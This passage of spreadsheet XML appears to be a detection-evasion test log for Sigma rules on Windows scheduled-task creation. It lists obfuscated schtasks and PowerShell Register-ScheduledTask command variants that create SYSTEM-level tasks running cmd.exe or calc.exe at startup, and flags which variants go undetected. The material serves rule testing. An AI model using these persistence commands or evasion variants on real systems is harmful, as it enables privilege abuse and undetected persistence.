      </c>
      <c r="D1537" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1537" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create -"TN" "TestTask" /TR "calc.exe" /"SC\tONSTART\t/RU\tSYSTEM"</t>
        </is>
      </c>
      <c r="F1537" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1537" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1537" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1537" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1537" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1538" ht="15.75" customHeight="1" s="42">
      <c r="A1538" s="43" t="n"/>
      <c r="B1538" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1538" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1538" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1538" s="44" t="inlineStr">
        <is>
          <t>schtasks /cREATe /TN "TestTask" /tR "calc.exe" /SC\tONSTART\t/RU\tSYSTEM</t>
        </is>
      </c>
      <c r="F1538" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1538" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1538" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1538" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1538" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1539" ht="15.75" customHeight="1" s="42">
      <c r="A1539" s="43" t="n"/>
      <c r="B1539" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1539" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1539" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1539" s="44" t="inlineStr">
        <is>
          <t>schtasks /CrEatE /"TN" "TestTask" /TR "calc.exe" /"SC\tONSTART\t/RU\tSYSTEM"</t>
        </is>
      </c>
      <c r="F1539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1539" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1539" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1539" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1539" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1540" ht="15.75" customHeight="1" s="42">
      <c r="A1540" s="43" t="n"/>
      <c r="B1540" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1540" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1540" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1540" s="44" t="inlineStr">
        <is>
          <t>schtasks /"Create" -"TN" "TestTask" /tr "calc.exe" /sC\TonSTArt\T/RU\TsYSteM</t>
        </is>
      </c>
      <c r="F1540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1540" s="43" t="n"/>
      <c r="J1540" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1540" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1541" ht="15.75" customHeight="1" s="42">
      <c r="A1541" s="43" t="n"/>
      <c r="B1541" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1541" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1541" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1541" s="44" t="inlineStr">
        <is>
          <t>schtasks /cREatE -"TN" "TestTask" /tR "calc.exe" /"SC\tONSTART\t/RU\tSYSTEM"</t>
        </is>
      </c>
      <c r="F1541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1541" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1541" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1541" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1541" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1542" ht="15.75" customHeight="1" s="42">
      <c r="A1542" s="43" t="n"/>
      <c r="B1542" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1542" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1542" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1542" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tn "SystemUpdater" /xml C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1542" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1542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42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1542" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1543" ht="15.75" customHeight="1" s="42">
      <c r="A1543" s="43" t="n"/>
      <c r="B1543" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1543" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1543" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1543" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /Tn "SystemUpdater" /XmL C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1543" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1543" s="43" t="n"/>
      <c r="J1543" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1543" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1544" ht="15.75" customHeight="1" s="42">
      <c r="A1544" s="43" t="n"/>
      <c r="B1544" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1544" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1544" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1544" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "SystemUpdater" /"xml" C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1544" s="43" t="n"/>
      <c r="J1544" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1544" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1545" ht="15.75" customHeight="1" s="42">
      <c r="A1545" s="43" t="n"/>
      <c r="B1545" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1545" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1545" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1545" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /Tn "SystemUpdater" /xml C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1545" s="44" t="n"/>
      <c r="J1545" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1545" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1546" ht="15.75" customHeight="1" s="42">
      <c r="A1546" s="43" t="n"/>
      <c r="B1546" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1546" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1546" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1546" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create -"tn" "SystemUpdater" /xML C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1546" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1546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46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1546" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1547" ht="15.75" customHeight="1" s="42">
      <c r="A1547" s="43" t="n"/>
      <c r="B1547" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1547" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1547" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1547" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTe /tn "SystemUpdater" -"xml" C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1547" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1547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47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1547" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1548" ht="15.75" customHeight="1" s="42">
      <c r="A1548" s="43" t="n"/>
      <c r="B1548" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1548" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1548" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1548" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"tn" "SystemUpdater" -"xml" C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1548" s="44" t="n"/>
      <c r="J1548" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1548" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1549" ht="15.75" customHeight="1" s="42">
      <c r="A1549" s="43" t="n"/>
      <c r="B1549" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1549" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1549" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1549" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "SystemUpdater" -"xml" C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1549" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1549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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1549" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1550" ht="15.75" customHeight="1" s="42">
      <c r="A1550" s="43" t="n"/>
      <c r="B1550" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1550" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1550" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1550" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREATe /"tn" "SystemUpdater" /xml C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1550" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1550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50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1550" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1551" ht="15.75" customHeight="1" s="42">
      <c r="A1551" s="43" t="n"/>
      <c r="B1551" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1551" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1551" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1551" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEAte /tn "SystemUpdater" -"xml" C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1551" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1551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51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1551" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1552" ht="15.75" customHeight="1" s="42">
      <c r="A1552" s="43" t="n"/>
      <c r="B1552" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_susp_pattern</t>
        </is>
      </c>
      <c r="C1552" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1552" s="44" t="inlineStr">
        <is>
          <t>f2c64357-b1d2-41b7-849f-34d2682c0fad</t>
        </is>
      </c>
      <c r="E1552" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CreAtE /Tn "SystemUpdater" /XMl C:\PerfLogs\malicious_task.xml</t>
        </is>
      </c>
      <c r="F1552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1552" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1552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552" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1552" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1553" ht="15.75" customHeight="1" s="42">
      <c r="A1553" s="43" t="n"/>
      <c r="B1553" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1553" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1553" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1553" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1553" s="44" t="n"/>
      <c r="J1553" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1553" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1554" ht="15.75" customHeight="1" s="42">
      <c r="A1554" s="43" t="n"/>
      <c r="B1554" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1554" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1554" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1554" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaNd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1554" s="44" t="n"/>
      <c r="J1554" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1554" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1555" ht="15.75" customHeight="1" s="42">
      <c r="A1555" s="43" t="n"/>
      <c r="B1555" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1555" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1555" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1555" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1555" s="44" t="n"/>
      <c r="J1555" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1555" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1556" ht="15.75" customHeight="1" s="42">
      <c r="A1556" s="43" t="n"/>
      <c r="B1556" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1556" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1556" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1556" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1556" s="44" t="n"/>
      <c r="J1556" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1556" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1557" ht="15.75" customHeight="1" s="42">
      <c r="A1557" s="43" t="n"/>
      <c r="B1557" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1557" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1557" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1557" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1557" s="44" t="n"/>
      <c r="J1557" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1557" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1558" ht="15.75" customHeight="1" s="42">
      <c r="A1558" s="43" t="n"/>
      <c r="B1558" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1558" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1558" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1558" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnD "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1558" s="43" t="n"/>
      <c r="J1558" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1558" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1559" ht="15.75" customHeight="1" s="42">
      <c r="A1559" s="43" t="n"/>
      <c r="B1559" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1559" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1559" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1559" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnd "Register-ScheduledTask -TaskName 'SystemTask2' -Action (New-ScheduledTaskAction -Execute 'cmd.exe') -User 'NT AUTHORITY\SYSTEM'"</t>
        </is>
      </c>
      <c r="F1559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1559" s="44" t="n"/>
      <c r="J1559" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1559" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1560" ht="15.75" customHeight="1" s="42">
      <c r="A1560" s="43" t="n"/>
      <c r="B1560" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1560" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1560" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1560" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "SystemTask1" /TR "cmd.exe" /SC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1560" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1560" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1560" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1560" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1561" ht="15.75" customHeight="1" s="42">
      <c r="A1561" s="43" t="n"/>
      <c r="B1561" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1561" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1561" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1561" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "SystemTask1" /tr "cmd.exe" /sC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1561" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1561" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1561" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1561" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1562" ht="15.75" customHeight="1" s="42">
      <c r="A1562" s="43" t="n"/>
      <c r="B1562" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1562" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1562" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1562" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /TN "SystemTask1" -"TR" "cmd.exe" /sC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1562" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1562" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1562" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1562" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1563" ht="15.75" customHeight="1" s="42">
      <c r="A1563" s="43" t="n"/>
      <c r="B1563" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1563" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges</t>
        </is>
      </c>
      <c r="D1563" s="44" t="inlineStr">
        <is>
          <t>89ca78fd-b37c-4310-b3d3-81a023f83936</t>
        </is>
      </c>
      <c r="E1563" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "SystemTask1" /"TR" "cmd.exe" /SC ONSTART /RU "S-1-5-18"</t>
        </is>
      </c>
      <c r="F1563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1563" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1563" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1563" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1563" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1564" ht="15.75" customHeight="1" s="42">
      <c r="A1564" s="43" t="n"/>
      <c r="B1564" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_system</t>
        </is>
      </c>
      <c r="C1564" s="44" t="inlineStr">
        <is>
